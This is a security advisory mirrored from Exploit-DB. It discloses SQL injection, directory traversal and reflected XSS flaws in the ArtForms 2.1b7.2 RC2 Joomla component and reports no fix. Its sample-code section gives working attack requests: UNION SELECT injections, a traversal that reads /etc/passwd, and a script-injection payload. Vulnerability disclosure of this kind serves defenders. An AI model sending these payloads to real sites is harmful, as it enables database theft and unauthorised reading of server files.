Joomla! Component ArtForms 2.1b7.2 rc2 – Multiple Vulnerabilities - 体验盒子

作者： Salvatore Fresta

日期： 2010-07-07

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14263/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

ArtForms 2.1b7.2 RC2 Joomla Component Multiple Remote Vulnerabilities

NameArtForms

Vendorhttp://joomlacode.org/gf/project/jartforms/

Versions Affected 2.1b7.2 RC2

AuthorSalvatore Fresta aka Drosophila

Website http://www.salvatorefresta.net

Contact salvatorefresta [at] gmail [dot] com

Date2010-07-07

X. INDEX

I.ABOUT THE APPLICATION

II. DESCRIPTION

III.ANALYSIS

IV. SAMPLE CODE

V.FIX

I. ABOUT THE APPLICATION

________________________

ArtForms is a popular Joomla component.

The ArtForms componentisapackagefor an easy From

Generator for Joomla 1.0.xx. Itallowsyou to generate

asmuchFormsasyou like, you can define all fields

thatyouneed and also make file upload and attachment

possible.

II. DESCRIPTION

_______________

Some parameters are not sanitisedbeforebeingused in

SQL queries and in danger PHP's functions.

The vulnerabilities are reported in version2.1b7.2 RC2.

Other versions may also be affected.

III. ANALYSIS

_____________

Summary:

A) Multiple SQL Injection

B) Directory Traversal

C) Reflected XSS

A) Multiple SQL Injection

_________________________

The parameters viewform and id are not properly sanitised

before being used in a SQL query.This can be exploited to

manipulate SQL queries by injecting arbitrary SQL code.

B) Directory Traversal

______________________

Thelparameterinalikon/captcha.php is not properly

sanitised before being used to create a pathfora file

that will be downloaded.This can be exploited to download

arbitraryfilesfrom localresourcesviadirectory

traversalattacks.

C) Reflected XSS

________________

Theafmsgparameterisnotproperly sanitised before

being printed.This allows the execution of arbitrary HTML

code.

IV. SAMPLE CODE

_______________

A) Multiple SQL Injection

index.php?option=com_artforms&task=ferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23

index.php?option=com_artforms&task=vferforms&id=1 UNION SELECT 1,2,3,4,5,6%23

index.php?option=com_artforms&task=tferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23

B) Directory Traversal

http://site/path/components/com_artforms/assets/captcha/includes/alikon/playcode.php?l=../../../../../../../../../../../../etc/passwd%00

C) Reflected XSS

index.php?option=com_artforms&formid=1&afmsg=<script>alert('xss');</script>

V. FIX

______

No fix.